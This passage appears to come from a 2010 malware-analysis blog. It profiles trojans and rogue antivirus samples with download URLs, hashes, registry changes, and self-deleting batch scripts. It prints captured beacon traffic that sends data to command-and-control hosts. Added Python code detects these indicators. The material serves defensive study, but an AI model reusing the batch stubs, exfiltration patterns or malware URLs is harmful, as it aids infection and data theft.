    _check32.bat:

    :Repeat
    del "C:\Documents and Settings\Administrateur\Bureau\spb.exe"
    if exist "C:\Documents and Settings\Administrateur\Bureau\spb.exe" goto Repeat
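The rdb/_check32-style batch files above (the 1.exe dropper's .bat and Asprox's _check32.bat) follow one pattern: delete the original executable, loop until the delete succeeds because the file is still locked while the process exits, then remove the batch file itself. Added here as a worked example (not the page's own code) is a small scorer for that pattern, the kind of check a sandbox can run over dropped files. The two malicious samples are copied from this page; the benign cleanup script is constructed for contrast.

```python
"""Flag self-deleting ("melt") batch stubs such as rdb.bat / _check32.bat (added example)."""
import re

SAMPLE_BATS = {
    # Copied from the soft.exe / 1.exe entry on this page ("exits" is the dropper's own typo).
    "1.exe.bat": r"""@echo off
:err
del /f /q C:\DOCUME~1\ADMINI~1\Bureau\1.exe
if exits C:\DOCUME~1\ADMINI~1\Bureau\1.exe goto err
del %0
""",
    # Copied from the Asprox spb.exe entry on this page.
    "_check32.bat": r""":Repeat
del "C:\Documents and Settings\Administrateur\Bureau\spb.exe"
if exist "C:\Documents and Settings\Administrateur\Bureau\spb.exe" goto Repeat
""",
    # Constructed benign cleanup script for contrast.
    "cleanup.bat": r"""@echo off
del /q %TEMP%\build.log
echo done
""",
}

LABEL_RE = re.compile(r"^\s*:(?P<label>[^:\s]\S*)")  # ':name' labels, but not '::' comments
DEL_RE = re.compile(r"^\s*@?\s*(?:del|erase)\b(?P<args>.*)$", re.I)
GOTO_RE = re.compile(r"\bgoto\s+:?(?P<label>\S+)", re.I)
SELF_REFS = {"%0", "%~0", "%~f0", "%~dpnx0"}  # ways a batch file names itself
EXEC_EXTS = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd")


def _del_targets(args):
    """Paths named on a del line, quotes removed, switches such as /f /q skipped."""
    targets = []
    for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', args):
        tok = quoted or bare
        if not tok.startswith("/"):
            targets.append(tok)
    return targets


def analyze_batch(text):
    """Score one batch file for the melt pattern and return indicators, targets and verdict."""
    labels, targets, indicators = {}, [], set()
    for lineno, line in enumerate(text.splitlines()):
        m = LABEL_RE.match(line)
        if m:
            labels.setdefault(m["label"].lower(), lineno)
            continue
        d = DEL_RE.match(line)
        if d:
            for tok in _del_targets(d["args"]):
                if tok.lower() in SELF_REFS:
                    indicators.add("self_delete")
                elif tok.lower().endswith(EXEC_EXTS):
                    indicators.add("deletes_executable")
                    targets.append(tok)
        g = GOTO_RE.search(line)
        # A goto back to an earlier label is the "retry until the locked file is gone" loop.
        if g and labels.get(g["label"].lower(), lineno) < lineno:
            indicators.add("backward_goto_loop")
    is_melt = "deletes_executable" in indicators and bool(
        indicators & {"self_delete", "backward_goto_loop"}
    )
    return {"indicators": sorted(indicators), "targets": targets, "is_melt_stub": is_melt}


def scan_samples():
    """Run the scorer over every embedded sample."""
    return {name: analyze_batch(text) for name, text in SAMPLE_BATS.items()}


if __name__ == "__main__":
    for name, result in scan_samples().items():
        print(name, result)
```

Matching the loop on a backward goto rather than on the literal `if exist` keeps the 1.exe stub flagged even though its author misspelled `exist`, and the deleted path comes out of the result so the original dropper can be correlated with the process that wrote the stub.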


    aspimgr.exe


  • Service created: aspimgr "Microsoft ASPI Manager": C:\WINDOWS\system32\aspimgr.exe


    Whois lookup:
    domain:     ML63AMGSTART.RU
    nserver:    ns1.ml63amgstart.ru. 72.252.193.94
    nserver:    ns2.ml63amgstart.ru. 98.244.20.222
    nserver:    ns3.ml63amgstart.ru. 76.181.108.122
    nserver:    ns4.ml63amgstart.ru. 69.134.222.78
    state:      REGISTERED, DELEGATED, VERIFIED
    person:     Private Person
    phone:      +79766542344
    e-mail:     ssa21@yandex.ru
    registrar:  NAUNET-REG-RIPN
    created:    2010.05.23
    paid-till:  2011.05.23
    source:     TCI

  • Phoning home:

    Response:

    "UPDATE.BIN" file:

    UPDATE.BIN

    New data received...

    Which actually did nothing.
  • [PDF] Anatomy of the Asprox Botnet by Dennis Brown
  • [WEB] ThreatExpert Submission aspimgr.exe

[Xylibox] Malware notification 2010/06/08 - File Name: setup.exe
  • Location: www.veropoema.net/setup.exe
  • Original filename: Unknown
  • File Type : Exe, Size : 98816 (018200h) Byte(s)
  • Packer: Unknown
  • EP: 00001C7F
  • EP Offset: 0000107F
  • EP Section: .text
  • Linker: 9.0
  • SHA1: 7fd08c6a9602c20924e807cc448621eba265cba9
  • Additional info: Trojan; creates/reads some registry keys, registers a driver, adds the file to the startup list.
    You can see some interesting stuff at: 0040144A
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
    PendingFileRenameOperations:
    \??\C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.tmp

    \??\C:\WINDOWS\TEMP\5.tmp

    \??\C:\WINDOWS\TEMP\6.tmp




[Xylibox] Malware notification 2010/06/04 - Security Tool (Rogue)
  • Location: http://soldierantivirus.com/install/setup.exe
  • FileName: 12800213.exe
  • File Type : Exe, Size : 832000 (0CB200h) Byte(s)
  • Packer: Custom
  • EP: 00001000
  • EP Offset: 00000400
  • EP Section: .text
  • Linker: 0.0
  • SHA1: 8163ce37d0dc43195f6f0f9092206c216dab7348
  • Additional info: Changes the desktop, allows only a few processes to run, finds fake infections, creates registry entries to run at startup.


  • Key to register the rogue: WNDS-S0DF5-GS5E0-FG14S-2DF8G

    Use MBAM to remove the rogue.




[Xylibox] Malware notification 2010/06/03 - Security essentials 2010 (Rogue)
  • Location: get-money-now.net/cgi-bin/ware.cgi?adv=000000000048170
  • FileName: SetupSE2010.exe
  • File Type : Exe, Size : 1523712 (0174000h) Byte(s)
  • Packer: Unknown
  • EP: 00007ECF
  • EP Offset: 000072CF
  • EP Section: .code
  • Linker: 7.0
  • SHA1: ad620469683947401d56d4c56e4eb44a1e6aed10
  • Additional info: Copies itself to "/%Program Files%\Securityessentials2010" (SE2010.exe)
    Security essentials 2010 displays a lot of warning messages, changes the desktop background, detects fake infections and blocks software execution. It comes from fake online scanners, malicious porn sites, fake cracks and exploits.


  • Here is a regfile I made to register the rogue:

    REGEDIT4

    [HKEY_CURRENT_USER\Software\SE2010]

    "KEY"="ISR10-F7D9M-P3B2A"
    "MAIL"="phoenixbytes@live.fr"

    [HKEY_LOCAL_MACHINE\SOFTWARE\SE2010]
    "KEY"="ISR10-F7D9M-P3B2A"

    Use MBAM to remove the rogue.




[Xylibox] Malware notification 2010/06/02 - GuardSoft, Ltd: Protection Center (Rogue)
  • Location: networkget.com/cgi-bin/153/n002106203r000cX92479924Yde437b93Z0100f060317P000000070
  • FileName: n002106203r000cX92479924Yde437b93Z0100f060317P000000070.exe
  • File Type : Exe, Size : 90112 (016000h) Byte(s)
  • Packer: Unknown
  • EP: 00001005
  • EP Offset: 00000405
  • EP Section: .text
  • Linker: 9.0
  • SHA1: 311ccf348faec1372196cfe7b5fcdb4f096d1f80
  • Additional info: Disables Drag'n'Drop*, deletes some registry keys* (* = secondary), blocks access to the clock, creates an executable in /%temp%/ (wscsvc32.exe) and runs it, copies itself to /%temp%/ and deletes itself (not the copy); an icon appears in the systray and from time to time shows balloon tips telling you that you are infected; once you click the balloon tip, "Protection Center" starts installing.


  • FileName: wscsvc32.exe
  • File Type : Exe, Size : 217600 (035200h) Byte(s)
  • Packer: Unknown
  • EP: 00001005
  • EP Offset: 00000405
  • EP Section: .text
  • Linker: 9.0
  • SHA1: 841886825521f6bc5819d6ac8758cbc2c810a6c4
  • Additional info: Fake Windows Security Center that redirects to Protection Center to make you buy a license.
    Creates a registry entry to disable Task Manager:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
    DisableTaskMgr =dword:00000001


  • FileName: cntprot.exe
  • File Type : Exe, Size : 1672192 (0198400h) Byte(s)
  • Packer: Unknown
  • EP: 00001005
  • EP Offset: 00000405
  • EP Section: .text
  • Linker: 9.0
  • SHA1: 3a0847129d749f52fa40cafe32477ba926fdf6d1
  • Info additionnel: Rogue, adds objects on the desktop, finds malware that does not exist in order to scare the user, schedules a reboot after a while (30-second countdown)
    3 shortcuts to pornographic sites:
    nudetube.com
    pornotube.com
    youporn.com

    3 applications that do nothing:
    spam001.exe
    spam003.exe
    troj000.exe

  • Here is a regfile I made to register the rogue:

    REGEDIT4

    [HKEY_LOCAL_MACHINE\SOFTWARE\Protection Center]

    "License"="94804860143697233939975370329435970097710202"
    "Email"="phoenixbytes@live.fr"

    Once registered it deletes the files it created, but... using MBAM is still the best thing to do.
    My screenshots speak for themselves.
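    Both regfiles above write the rogue's own license key into the registry to silence it; seen from the defender's side, the same key paths, plus the DisableTaskMgr policy value that wscsvc32.exe sets, are usable as indicators of compromise. The following is an added example and not Xylibox's code: a small Python scanner that parses a registry export in REGEDIT4 text form (the format both regfiles use, and the one regedit's export produces) and reports the indicator keys named in the Security essentials 2010 and Protection Center entries. The function names and the sample export are my own; the sample is constructed from the keys on this page plus a benign key, to show that only the listed paths are reported.

```python
import re

# Registry paths named in the two rogue entries above (Security essentials 2010
# and Protection Center), plus the policy value wscsvc32.exe sets to disable
# Task Manager. Matching is case-insensitive, as the registry itself is.
ROGUE_KEYS = {
    r"HKEY_CURRENT_USER\Software\SE2010": "Security essentials 2010 license key",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\SE2010": "Security essentials 2010 license key",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Protection Center": "Protection Center license key",
}
POLICY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system"

VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')
DWORD_RE = re.compile(r"^dword:([0-9A-Fa-f]{1,8})$")


def parse_reg(text):
    """Parse REGEDIT4 / 'Windows Registry Editor Version 5.00' export text into
    {key_path: {value_name: raw_value}}. Only "name"="string" and
    "name"=dword:xxxxxxxx lines are handled, which covers the notes above.
    (A file written by 'reg export' is UTF-16; decode it before calling this.)"""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("REGEDIT", "Windows Registry Editor", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = m.group(2)
    return keys


def dword(raw):
    """Decode a dword:xxxxxxxx export value, or None if it is not one."""
    m = DWORD_RE.match(raw or "")
    return int(m.group(1), 16) if m else None


def find_rogue_indicators(text):
    """Return sorted (key_path, description) pairs for every indicator present."""
    keys = parse_reg(text)
    by_lower = {k.lower(): v for k, v in keys.items()}
    findings = []
    for path, desc in ROGUE_KEYS.items():
        if path.lower() in by_lower:
            findings.append((path, desc))
    policy = by_lower.get(POLICY_KEY.lower(), {})
    if dword(policy.get("DisableTaskMgr")) == 1:
        findings.append((POLICY_KEY, "DisableTaskMgr=1 (Task Manager disabled)"))
    return sorted(findings)


# Constructed sample export: the Protection Center key and the Task Manager
# policy from the notes above, plus a benign key that must not be reported.
SAMPLE_EXPORT = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Protection Center]
"License"="94804860143697233939975370329435970097710202"
"Email"="phoenixbytes@live.fr"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"DisableTaskMgr"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\SomeVendor\Clean]
"Installed"=dword:00000001
"""

if __name__ == "__main__":
    for path, desc in find_rogue_indicators(SAMPLE_EXPORT):
        print("[%s] %s" % (path, desc))
```

    On a live machine the same paths can be checked with `reg query`; a DisableTaskMgr value of 1 under the policies\system key is the thing to reset once the rogue's processes are gone, since the rogue itself is what keeps re-applying it.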



  • license.txt:
    Thanks for purchasing antivirus software. Your antivirus software is activated successfully.
    Your registration key is:
    94804860143697233939975370329435970097710202
    (PLEASE, SAVE IT SEPARATELY IN CASE YOU NEED TO REBOOT OR REINSTALL ANTIVIRUS SOFTWARE)
    The last version of antivirus:
    http://edscorpor.com/customers/installer.php?pid=PROTCNT_BASIC

    You can also find this link in your software HELP & SUPPORT part. Please, use this link in case of reinstallation.
    If you have any question, please, pay attention to tickets, Help&Support. You can find out the answer on your question there.
    For urgent cases, please, contact us on the phone
    1-866 427 1693.
    Thank you!




[Xylibox] Malware notification 2010/06/02 - File Name: exe.exe
  • Localisation: winter-smile.com/cgi-bin/get.pl?l=000000000048170
  • Original Name: php.exe
  • File Type : Exe, Size : 90112 (016000h) Byte(s)
  • Packer: Unknown
  • EP: 00001A80
  • EP Offset: 00000E80
  • EP Section: .text
  • Linker: 9.0
  • Info additionnel: Creates a copy in the temp folder; incomplete trojan? There is code to register a driver but it is never reached.
  • SHA1: adb35d244a4907f43f43e1a282bd38ff509b2f81

[Xylibox] Malware notification 2010/06/02 - File Name: z.exe
  • Localisation: www.vilabonanza.com.br/portal/media/z.exe
  • Original Name: Stub.exe
  • File Type : Exe, Size : 210972 (03381Ch) Byte(s)
  • Packer: Unknown
  • EP: 00001130
  • EP Offset: 00001130
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Creates a copy in the temp folder, creates a registry entry to start together with Windows, trojan horse
  • SHA1: 603a0a06d571009714fc622d7bc1effabbe00133

[Xylibox] Malware notification 2010/06/02 - Virus Protector (5.1) 1.0.0.36 (Rogue)
  • Localisation: www.zerovir.com/armja3kh6a74vyzmx0.html?get=20ec449778858d3062592f457c0c4d4f
  • Original Name: Npdsplay.dll
  • File Type : Exe, Size : 1431552 (015D800h) Byte(s)
  • Packer: Unknown
  • EP: 00001000
  • EP Offset: 00000400
  • EP Section: .text
  • Linker: 7.10
  • Info additionnel: Creates .exe and .dll files in /system32/ and /driver/; one DLL (HTMLayout.dll) is created in the temp folder; displays fake spam and a fake DDoS to scare the user; browsing is blocked for a few sites; blocks access to Task Manager and regedit
  • SHA1: 9cf882049a82de2f56e6660330a1dd0e330510ad

[Xylibox] Malware notification 2010/06/01 - File Name: .p
  • Localisation: ytu65ewq.3322.org:12/.p
  • Additional info: it comes from China.

    p.exe creates:
    TraversinIE.exe
    0504_1[1].exe
    13[1].exe
    extext7995062t.exe

    p.exe (main malware):
  • File Type : Exe, Size : 31013 (07925h) Byte(s)
  • EP: 00001030
  • Packed: Upack 2.x - 3.x Heuristic Mode -> Dwing
  • EP Offset: 00000030
  • Linker: 0.50
  • Section: .Upack
  • SHA-1: C6ECD8899A176573A50B1412BF17EE761E964772
  • ###[UNPACKED]###
  • File Type : Exe, Size : 331776 (051000h) Byte(s)
  • EP: 000030F3
  • EP Offset: 000030F3
  • Linker: 0.50
  • Section: .Upack

  • TraversinIE.exe
  • Original name: uc98.EXE
  • File Type : Exe, Size : 18944 (04A00h) Byte(s)
  • EP: 0000B7F0
  • EP offset: 00003BF0
  • Linker: 6.0
  • Section: UPX1
  • SHA-1: 1CB62358A1E2E96D7D4D3C2C5E7153517EB5F422
  • ###[UNPACKED]###
  • Original filename: uc98.EXE
  • File Type : Exe, Size : 61440 (0F000h) Byte(s)
  • EP: 0000B7F0
  • EP offset: 00003BF0
  • Linker: 6.0
  • Section: UPX1

  • 0504_1[1].exe
  • Packed: UPX 3.03
  • SHA-1: 6D1D11B13B23D33F9A7779895474AA6238A32AD1
  • File Type : Exe, Size : 41984 (0A400h) Byte(s)
  • EP: 000159C0
  • EPOffset: 00009DC0
  • Linker: 6.0
  • Section: UPX1
  • ###[UNPACKED]###
  • File Type : Exe, Size : 102400 (019000h) Byte(s)
  • EP: 00006106
  • EP Offset: 00006106
  • linker: 6.0
  • Section: UPX0

  • 13[1].exe
  • Packed: UPX 3.03
  • SHA-1: E8E118D49086E2AA510229DF8DFEAF22471732FF
  • File Type : Exe, Size : 20992 (05200h) Byte(s)
  • EP: 0000E780
  • EPOffset: 00004B80
  • Linker: 6.0
  • Section: UPX1
  • ###[UNPACKED]###
  • File Type : Exe, Size : 73728 (012000h) Byte(s)
  • EP: 0000248F
  • EP Offset: 0000248F
  • linker: 6.0
  • Section: UPX0

  • extext7995062t.exe
  • Packer: Unknown
  • SHA-1: 80C0CBBE011CF5CC41AE050DC47CD6C60006BF9A
  • File Type : Exe, Size : 12288 (03000h) Byte(s)
  • EP: 0000097C
  • EPOffset: 0000097C
  • Linker: 6.0
  • Section: .text
  • Behaviour: Disables NOD32 (erkn.exe, egui.exe) and performs other actions with notepad.exe and cmd.exe, all with ShowState = SW_HIDE
    Creates a DLL (tete13015250t.dll) and runs it with rundll32.exe
    The DLL disables a few anti-virus products, and then the DLL is deleted:

    004034AB . 50 PUSH EAX ; /FileName = "C:\WINDOWS\tete13015250t.dll"
    004034AC . FF15 04104000 CALL DWORD PTR DS:[<&KERNEL32.DeleteFile>; \DeleteFileA

    The application creates a driver (pcidump.sys), registers it (ADVAPI32.OpenSCManagerA) / starts the service / deletes the driver.
    Other applications are generated, such as "TraversinIE.exe",
    which browse to sites and try to attack with a downloaded .dat file
    (saved in /system32/AttackSet.dat);
    the .dat file contains a list of sites and IPs

    At the end, p.exe creates a .bat in the same folder it sits in (afc90a.bat)
    contents:
    @echo off
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @del 321.aqq
    @del "C:\Documents and Settings\Administrateur\Bureau\dumped.exe"
    @del afc90a.bat
    @exit

    and at the end:
    004030E6 . 6A 00 PUSH 0 ; /ExitCode = 0
    004030E8 . FF15 64104000 CALL DWORD PTR DS:[<&KERNEL32.E>; \ExitProcess

    processes running in the background:
    TraversinIE.exe (several copies, even)
    0504_1[1].exe
    13[1].exe
    extext7995062t.exe


[Xylibox] Malware notification 2010/05/31 - File Name: agressive.exe [Updated]
  • Localisation: www.paradstars.com/images/agressive.exe
  • Original Name: Unknown
  • File Type : Exe, Size : 159264 (026E20h) Byte(s)
  • Packer: Unknown
  • EP: 00005C47
  • EP Offset: 00004E47
  • EP Section: .data
  • Linker: 8.0
  • Info additionnel: trojan, creates a .sys file, uses the Service Control Manager to register it, starts the service, opens cmd and self-destroys the file agressive.exe

  • Update:
    Video

[Xylibox] Malware notification 2010/05/30 - File Name: video.4785.avi.exe
  • Localisation: videohubb.in/mpeg/video.4785.avi.exe
  • Original Name: Unknown
  • File Type : Exe, Size : 101376 (018C00h) Byte(s)
  • Packer: Unknown
  • EP: 00008121
  • EP Offset: 00007721
  • EP Section: .text
  • Linker: 2.11
  • Info additionnel: create new files, send data
  • SHA1: a82978cc5da96967fd89d52847053aa4e016d6e5
    protod.exe:
    http://blueriverarts.com/ramamba-hara-mamba-rum.php
    Parameter: e
    Value: v22MmGezHIyjUzFl61YdHLJrOeDmJ4Q6O41eHyF2exxSCwCA2UWMzTylUVrHIQqMgMqV7MsRLgiBMF4bFG3zf4iRtufQpaX/Nvtqv 7plA==

    http://freesurrealarts.com/logos/625ce14e091ad92707df4b6899314e9c6fb8b42436c12950de2d820a172d1687700ddf8a2ba3a32d7/e4851217d9a/logo.gif

    http://dvdvideoarts.com/werber/f495f2b7e93/217.gif


    http://picturegraffitoarts.com/perce/d24c31dea91a89c7271f0b38a9f16e7cafc8f49456f159402e7da20ae72db6c760fdaf1a0b23e32d3/f465e2f7d95/qwerce.gif
    Note: the data changes every time you run the exe.

  • rundll32.exe:
    http://cuert.com/oms.php
    POST /oms.php HTTP/1.0
    Host: cuert.com
    User-Agent: XML
    Content-Length: 129
    Content-Type: application/x-www-form-urlencoded
    data=hv7ROK5vhoufT3ysRPtwhSdCPiNb1+ERI3HxgCf1AKQmBpHjUtsTW9XhkpL+0Jnplbyi6nsRfpCeQNe5SY1MWNROxBqZWIbwZFfGpPZRgQZXMdOnVnnp7vE2mg==

  • Ysl.exe:
    http://livingtraffic.com/borders.php (Navigate to a random Ad)
    POST /borders.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
    Host: livingtraffic.com
    Content-Length: 397
    Connection: Keep-Alive
    Cache-Control: no-cache
    data=/CjEfcGBu0aC2aRzshY15Se2ybtC5dpImg/w+Tex1QY4wJ5rq8UzvceeHLjiBkG/g+7VCC/0pBqxOHp7eRcHPiYo99QMUujgUW4boDIVJrfNWKSLnrd6100X8mVNwwq4vOQxSHXwpz9Hm0kz9fBfaUn10x/GLcofRiH4LvFsAiGYFsaioMW07K0E3rkk3MeZUygDeLGw2s12+oPMNrnJZczhzZ8xiNWu5TgOhq4OqUS0BMTdK2bZy/hj22fYPROJBldybEq/4kfeYEcl/ciRQeLEgdooChJv/oVzPhBsvCkqww83oFaArnsLuMFzziWRoD1780koO+1moE1TtNIfizqep68zCkdvTeZIElQ4H99xQXKEQX4bhp4bhaKbKGEJkbdfBT72
  • Original Name: Unknown
  • File Type : Exe, Size : 121344 (01DA00h) Byte(s)
  • Packer: Unknown
  • EP: 00001957
  • EP Offset: 00000D57
  • EP Section: .text
  • Linker: 6.0
  • SHA1: 0a908be22c5e50e813825b0656e1f152fd1f1d1d

  • Ylopea.exe:
    http://idirecttraffic.com/ad_type.php
    Parameter: a
    Value: ULH1WNOYRUPTo7pdPZuneTl26XNd3lSN44zzdNAY1bYu0+q2jVNP4oBMVB0=
  • Original Name: Unknown
  • File Type : Exe, Size : 124928 (01E800h) Byte(s)
  • Packer: Unknown
  • EP: 0000193A
  • EP Offset: 00000D3A
  • EP Section: .text
  • Linker: 6.0
  • SHA1: 1164787b6452fb37c130b22970d55de1e1f3e797

[Xylibox] Malware notification 2010/05/30 - File Name: protod.exe
  • Localisation: 78.140.15.82/protod.exe
  • Original Name: Unknown
  • File Type : Exe, Size : 117760 (01CC00h) Byte(s)
  • Packer: Unknown
  • EP: 00012F68
  • EP Offset: 00012368
  • EP Section: .data
  • Linker: 9.0
  • Info additionnel: trojan, creates multiple registry keys, sends data to a site?

    POST /put_accs.dll HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
    Host: v00d00.org
    Accept: text/html
    Connection: Keep-Alive
    Content-Length: 125
    Content-Type: multipart/form-data; boundary=----------1Qk3GIrIlvvwlKGhmCTAw8

    ------------1Qk3GIrIlvvwlKGhmCTAw8
    Content-Disposition: form-data; name="data"

    ------------1Qk3GIrIlvvwlKGhmCTAw8--

  • SHA1: e99a3cedde43f8a081ff6596906b20089ea4def3
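    The captured POSTs in this entry and in the video.4785.avi.exe entry above share the traits an analyst looks for in beacon traffic: a User-Agent that is not a browser ("XML"), a form field carrying an opaque base64-like blob, and a multipart upload whose only field is empty. As an added example that is not part of the original notes, the Python below parses raw HTTP request captures and reports those traits per request. The three captures are constructed from the hosts and paths listed on this page, with shortened, made-up bodies so that the Content-Length values are exact; the function names are mine.

```python
import re

# Constructed captures modelled on the POSTs in the video.4785.avi.exe and
# protod.exe notes (hosts and paths from the notes; bodies shortened and
# made up so that the Content-Length values below are exact).
CAPTURES = [
"""POST /oms.php HTTP/1.0
Host: cuert.com
User-Agent: XML
Content-Length: 29
Content-Type: application/x-www-form-urlencoded

data=hv7ROK5vhoufT3ysRPtwhQ==""",
"""POST /borders.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: livingtraffic.com
Content-Length: 25
Connection: Keep-Alive

data=/CjEfcGBu0aC2aRzshY1""",
"""POST /put_accs.dll HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: v00d00.org
Content-Type: multipart/form-data; boundary=----------1Qk3GIrIlvvwlKGhmCTAw8

------------1Qk3GIrIlvvwlKGhmCTAw8
Content-Disposition: form-data; name="data"

------------1Qk3GIrIlvvwlKGhmCTAw8--""",
]

BROWSER_UA = re.compile(r"^(Mozilla|Opera)/")      # what a real IE/Firefox of the era sends
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")   # base64 alphabet, optional padding


def parse_request(raw):
    """Split a raw HTTP request into request line, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.splitlines()
    method, path, version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def form_fields(body):
    """Split an application/x-www-form-urlencoded body into a dict (values left raw)."""
    fields = {}
    for part in body.split("&"):
        name, sep, value = part.partition("=")
        if sep:
            fields[name] = value
    return fields


def multipart_parts(body, boundary):
    """Yield (field_name, payload) for each part of a multipart/form-data body."""
    for chunk in body.split("--" + boundary):
        chunk = chunk.strip("\n")
        if not chunk or chunk == "--":
            continue
        phead, _, payload = chunk.partition("\n\n")
        m = re.search(r'name="([^"]*)"', phead)
        yield (m.group(1) if m else "?"), payload


def assess(raw):
    """Return host, path and the list of beacon-like traits found in one request."""
    req = parse_request(raw)
    h = req["headers"]
    flags = []
    ua = h.get("user-agent", "")
    if not BROWSER_UA.match(ua):
        flags.append("non-browser User-Agent: %r" % ua)
    declared = h.get("content-length")
    if declared is None:
        flags.append("no Content-Length on a POST")
    elif int(declared) != len(req["body"]):
        flags.append("Content-Length %s != actual body %d" % (declared, len(req["body"])))
    ctype = h.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        for name, value in form_fields(req["body"]).items():
            if len(value) >= 16 and B64_BLOB.match(value):
                flags.append("opaque base64-like blob in field %r (%d chars)" % (name, len(value)))
    elif ctype.startswith("multipart/form-data"):
        m = re.search(r"boundary=(\S+)", ctype)
        for name, payload in multipart_parts(req["body"], m.group(1) if m else ""):
            if not payload.strip():
                flags.append("empty multipart field %r" % name)
    return {"host": h.get("host"), "path": req["path"], "flags": flags}


if __name__ == "__main__":
    for cap in CAPTURES:
        r = assess(cap)
        print(r["host"], r["path"])
        for f in r["flags"]:
            print("   -", f)
```

    None of these traits is proof on its own (plenty of legitimate software posts base64 blobs), but a non-browser User-Agent plus an opaque body to a host the machine has never resolved before is the combination worth pivoting on in proxy logs, and the host/path pairs the function extracts are what you would block or hunt for.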

[News] 2010/05/29 - Concours Crack Me ESET

    Aimed more particularly at computer science students, the "Crack Me" game is a contest whose objective is to analyse the source code of the program "ESET_crack-me.exe" in order to find 3 hidden messages. This contest was originally an entrance test given to candidates applying for a developer position at the antivirus vendor ESET.

    The challenge? Be the fastest to analyse the code, find the flaws and be the first to reveal the hidden messages!!! Outwit the traps, decode the final message and try to win a trip to Bratislava, Slovakia, to discover the well-kept secrets of the famous ESET laboratory where the NOD32 antivirus is developed.

    Many prizes to win: internship and job opportunities at ESET!
    100% WINNING contest: 3 months of antivirus protection offered to all participants

    Trip to Bratislava and exclusive visit of the ESET lab*
    Discover the anti-malware research laboratory of the famous antivirus vendor ESET, based in Slovakia.

    Looking for a student job? Take part in the crackme contest and receive our offers by e-mail.

    Crack Me contest organised by the vendor ESET


[Xylibox] Malware notification 2010/05/018 - File Name: Facebook Hacking By ImadowS.exe
  • Localisation: http://www.youtube.com/watch?v=xH44cH07eQc
  • Original Name: Stub.exe
  • File Type : Exe, Size : 990155 (0F1BCBh) Byte(s)
  • Packer: SFX ZIP Archive
  • EP: 00007481
  • EP Offset: 00007481
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: When run, creates 2 files in "C:\ProgramFiles" and runs them
    » Facebook Hacking By ImadowS.exe
    - Original Name: Faceboax.exe
    - Packed: X-treme Protector v1.07
    - EP: 0007E21E
    - EP offset: 0007C61E
    - Linker: 8.0
    - EP Section: .text
    - File Type : Exe, Size : 868352 (0D4000h) Byte(s)

    » server.exe
    - Original Name: Unknown
    - Packed: X-treme Protector v1.07
    - EP: 0000A014
    - EP offset: 00008614
    - Linker: 6.0
    - EP Section: WinLicen
    - File Type : Exe, Size : 990589 (0F1D7Dh) Byte(s)
  • SHA1 (Facebook Hacking By ImadowS.exe): 34291c134e31b1e10f4c819eba3b03838bee64d3
  • SHA1 (Facebook_Hacking_By_ImadowS.exe): 546b094d4d7442301c471da90991c55ab6de9e58
  • SHA1 (server.exe): 389cc6a3081813af1ebfaa7a437777e08a6c3b91

[News] 2010/05/17 - Une menace virtuelle peut-elle ruiner votre existence réelle ?

    Even though the story is not new, it is always worth relaying the information because this phenomenon is still current, and also to give back a little dignity to a man who never asked anyone for anything.

    UNITED STATES - An investigation reveals that innocent owners of infected computers could be wrongly accused

    «It wasn't me, it was a virus.» The excuse is reportedly commonly used by paedophiles to justify the presence of child pornography images on their hard drive. An Associated Press investigation reveals, however, that in at least one case, it is the truth.


    Michael Fiola with his wife Robin

    The case of Michael Fiola, fired in 2007 by his employer, who had found child pornography files on his computer.

    Accused of paedophilia, Michael Fiola faced 5 years in prison in Massachusetts. His car tyres were slashed, he lost all his friends and he himself received death threats, but he decided to defend himself.
    Fortunately his wife stood by him, and his lawyers had forensic examinations carried out which revealed that his computer was infected.

    «It ruined my life, my wife's life and my family's life»

    A virus was programmed to visit around forty child pornography sites per minute.
    New tests, carried out by the prosecutor, confirmed the defence's findings and the charges against Michael Fiola were dropped.

    The case cost Michael Fiola 250,000 dollars (more than 165,000 euros); he had to mortgage his house and sell his car.
    «It ruined my life, my wife's life and my family's life», he says today.
    Thanks to ¥ω₪h (MAD).


[XyliBox] Xylibox Malware Challenge 1# - Get XyliBoxed! [Updated]

    Xylibox Malware Challenge 1#:
    Difficulty: 2 - Needs a little brain (or luck)
    Platform: Windows XP
